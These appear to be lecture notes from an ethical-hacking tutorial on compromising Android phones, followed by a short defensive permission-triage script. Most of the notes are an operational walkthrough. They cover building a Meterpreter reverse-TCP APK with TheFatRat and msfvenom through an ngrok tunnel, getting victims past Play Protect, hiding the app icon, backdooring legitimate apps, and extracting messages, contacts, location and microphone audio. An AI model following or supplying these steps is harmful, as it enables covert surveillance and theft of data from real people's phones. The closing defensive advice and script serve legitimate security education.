
Cybersecurity: Remote Access Exploitation on Android

Mar 9, 2025

Lecture Notes: Remote Access Exploitation on Android Devices

Introduction

  • Importance of cybersecurity and ethical hacking education
  • Topic: Remote access exploitation on Android devices
  • Warning: Knowledge shared for educational purposes only; unauthorized use is illegal.

Why Android Devices are Attractive Targets

  • Over 3 billion active Android devices worldwide
  • Android devices store users' entire digital lives: banking, social media, etc.
  • Exposure stems from Android's open nature: installing apps from unknown sources (sideloading) is permitted.

Trust and Exploitation

  • Users often install apps from outside the Play Store
  • Malicious apps masquerading as legitimate apps can steal information
    • Access to camera, microphone, messages, passwords, location, photos, and files.

Tools Needed for Demonstration

  • TheFatRat: Exploitation framework for creating backdoors and payloads
  • ngrok: Tunneling tool to create secure tunnels to localhost.

Setting Up TheFatRat

  1. Update system: sudo apt update
  2. Upgrade system: sudo apt upgrade
  3. Install TheFatRat from the Screetsec GitHub repository
    • Clone repository: git clone [repository link]
    • Run installation script: chmod +x setup.sh and ./setup.sh
  4. Configure the output folder and enable running from anywhere.

Setting Up ngrok

  1. Download ngrok for Linux
  2. Run basic command: ngrok http 80
    • Configure account and auth token as prompted.

Creating the Malicious Payload

  1. Launch TheFatRat and select "Create backdoor with msfvenom"
  2. Choose Android payload:
    • Set LHOST to ngrok TCP address
    • Set LPORT to ngrok's port number
  3. Name output file and generate the APK (malicious app).

Transferring the Payload

  1. Use Python HTTP server to host APK: python3 -m http.server 90
  2. Download APK on target Android device
    • Bypass Play Protect warnings to install.

Setting Up Metasploit Listener

  1. Launch Metasploit: msfconsole
  2. Configure handler:
    • Use module: use exploit/multi/handler
    • Set payload to android/meterpreter/reverse_tcp
    • Set LHOST and LPORT
  3. Open modified malicious app on target device to establish connection.

Demonstration of Capabilities

  • Commands available in Meterpreter:
    • sysinfo: Device information
    • webcam_list: List available cameras
    • dump_calllog, dump_contacts, dump_sms: Extract call logs, contacts, messages
    • geolocate: Get device location
    • record_mic: Record audio
    • screenshare: Live screen feed
    • screenshot: Capture screen image
  • Malicious app can hide its icon while maintaining functionality.

Advancing the Attack: Backdooring Legitimate Apps

  • Select "Backdooring Original APK" in TheFatRat
  • Input legitimate APK path for injection
  • Use reverse TCP payload to maintain functionality of the legitimate app.

Installing and Signing the Modified APK

  1. Download required tools if errors occur (e.g., APKTool version).
  2. Modify and recompile APK with injected payload.

Protecting Yourself from These Attacks

  1. Never install apps from unknown sources.
  2. Heed Google Play Protect warnings.
  3. Regularly check installed apps for anomalies.
  4. Monitor app permissions closely.
  5. Use reliable mobile security solutions.
  6. Monitor network connections and battery usage.
  7. Use Safe Mode (which disables third-party apps) for malware identification.
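As an added defensive example (not part of the lecture), the Python triage script below supports items 3 and 4: it reads the text of `adb shell pm list packages -i` and `adb shell dumpsys package <pkg>` from a device with USB debugging enabled and flags apps that were not installed by the Play Store yet request the permission set behind the Meterpreter commands listed earlier (camera, microphone, SMS, call log, contacts, location). The sample outputs are constructed, and the command output formats are assumed from standard Android tooling.

```python
import re
PLAY_STORE = "com.android.vending"
# Permissions behind the Meterpreter commands listed in the notes
# (webcam_list, record_mic, dump_sms, dump_calllog, dump_contacts, geolocate).
SPYWARE_PERMISSIONS = {
    "android.permission.CAMERA", "android.permission.RECORD_AUDIO",
    "android.permission.READ_SMS", "android.permission.READ_CALL_LOG",
    "android.permission.READ_CONTACTS", "android.permission.ACCESS_FINE_LOCATION",
}

def parse_installers(pm_output):
    # `adb shell pm list packages -i` prints "package:<pkg>  installer=<pkg|null>"
    return dict(re.findall(r"package:(\S+)\s+installer=(\S+)", pm_output))

def parse_requested_permissions(dumpsys_output):
    # dumpsys package <pkg>: entries under "requested permissions:" are indented deeper.
    perms, header_indent = set(), None
    for line in dumpsys_output.splitlines():
        indent = len(line) - len(line.lstrip())
        if line.strip() == "requested permissions:":
            header_indent = indent
        elif header_indent is not None:
            if line.strip() and indent > header_indent:
                perms.add(line.strip().split(":")[0])
            else:
                break  # reached the next section (e.g. "install permissions:")
    return perms

def triage(pm_output, dumpsys_by_pkg, threshold=4):
    # Flag non-Play-Store (sideloaded) apps requesting >= threshold spyware permissions.
    installers = parse_installers(pm_output)
    flagged = []
    for pkg, dump in dumpsys_by_pkg.items():
        installer = installers.get(pkg, "null")
        if installer == PLAY_STORE:
            continue
        matched = parse_requested_permissions(dump) & SPYWARE_PERMISSIONS
        if len(matched) >= threshold:
            flagged.append((pkg, installer, sorted(matched)))
    return flagged

# Constructed sample output: shape follows the real commands, names are made up.
SAMPLE_PM = ("package:com.example.freegame  installer=null\n"
             "package:com.android.chrome  installer=com.android.vending\n")
SAMPLE_DUMPSYS = {
    "com.example.freegame": "    requested permissions:\n"
        + "".join(f"      {p}\n" for p in sorted(SPYWARE_PERMISSIONS))
        + "    install permissions:\n      android.permission.INTERNET: granted=true\n",
    "com.android.chrome": "    requested permissions:\n      android.permission.CAMERA\n",
}
```

Anything `triage` returns deserves a manual review of the app's origin, not automatic removal; a legitimate sideloaded app (an enterprise MDM client, for instance) can request the same permissions.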

Conclusion

  • Knowledge of these attacks is crucial for defense.
  • Ethical responsibility: Do not use this knowledge for malicious purposes.
  • Encourage viewers to subscribe for ongoing cybersecurity education.